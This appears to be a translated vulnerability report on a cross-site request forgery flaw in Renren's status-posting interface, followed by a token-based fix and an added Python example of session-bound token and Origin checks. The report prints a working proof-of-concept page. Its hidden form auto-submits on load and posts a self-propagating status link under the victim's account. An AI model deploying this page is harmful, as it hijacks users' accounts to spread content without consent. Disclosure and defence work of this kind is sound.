Scripts. http://bookman.sinaapp.com/doover.php"
Detailed description:
I checked the source code of the link; it submits through the Renren shopping interface.
The interface address is http://j.renren.com/publisher/status. You only need to POST content to the interface.
The post content on this page is "ended, this is my self-white XXXX".
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>love your words</title>
</head>
<body>
<!-- Zero-size iframe receives the response, so the visitor sees nothing -->
<iframe name="destination" width="0" height="0"></iframe>
The number bookman loves you. Welcome to the "Xiao Han Bookman" workspace.
<div id="kotify" style="float: left; display: none;">
<!-- Hidden cross-site form aimed at the status interface -->
<form id="akiko" name="akiko" action="http://j.renren.com/publisher/status" method="POST" target="destination">
<input type="text" name="synsbcp" value="1"/>
<p>raw: <input type="text" name="content" value="is over. This is my self-control. If you want to understand the principle, check my log. http://bookman.sinaapp.com/doover.php"/></p>
<input type="submit" value="Submit"/>
</form>
</div>
<script>
// Submits the form as soon as the page loads, with the visitor's cookies attached
document.akiko.submit();
</script>
</body>
</html>
Solution:
Everyone knows more than I do. In the past, Flash was similar; that was in-site email.
Adding a token to verify requests is an easy fix for this vulnerability.
A low-level error, not from the Internet.
Author: leo108 and white bear
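
The token check suggested under "Solution", as an added example that is not code from the original report or from Renren. It binds a token to the user's session and also checks the request's Origin; the handler, the csrf_token field name and the sample requests are assumptions constructed for illustration.

```python
import hashlib
import hmac
import secrets
from urllib.parse import urlsplit

SERVER_KEY = secrets.token_bytes(32)   # per-deployment secret, constructed here
TRUSTED_HOSTS = {"j.renren.com"}       # host of the form action shown on this page
TOKEN_FIELD = "csrf_token"             # hypothetical hidden-field name

def _mac(session_id, nonce):
    msg = f"{session_id}|{nonce}".encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()

def issue_token(session_id):
    """Token the site embeds in its own form: nonce plus a MAC bound to the session."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"

def token_valid(session_id, token):
    nonce, sep, mac = (token or "").partition(".")
    if not sep:
        return False
    # Compare as bytes in constant time; a token from another session fails here.
    return hmac.compare_digest(mac.encode(), _mac(session_id, nonce).encode())

def origin_trusted(headers):
    """Second layer: reject posts whose Origin/Referer is absent or another site."""
    source = headers.get("Origin") or headers.get("Referer")
    return bool(source) and urlsplit(source).hostname in TRUSTED_HOSTS

def handle_status_post(session_id, headers, form):
    """Hypothetical stand-in for the status endpoint; returns (status, reason)."""
    if not origin_trusted(headers):
        return 403, "cross-site origin"
    if not token_valid(session_id, form.get(TOKEN_FIELD)):
        return 403, "missing or invalid token"
    return 200, "status posted"

# Constructed requests: the first mirrors the auto-submitted form on this page.
FORGED_HEADERS = {"Origin": "http://bookman.sinaapp.com"}
FORGED_FORM = {"synsbcp": "1", "content": "constructed sample text"}
SAME_SITE = {"Origin": "http://j.renren.com"}

if __name__ == "__main__":
    sid = "constructed-session-id"
    genuine = {"content": "hello", TOKEN_FIELD: issue_token(sid)}
    print(handle_status_post(sid, FORGED_HEADERS, FORGED_FORM))
    print(handle_status_post(sid, SAME_SITE, FORGED_FORM))
    print(handle_status_post(sid, SAME_SITE, genuine))
```

The forged form fails both checks: its Origin is another site, and that page cannot read the token from the victim's session, so it has nothing valid to put in the hidden field.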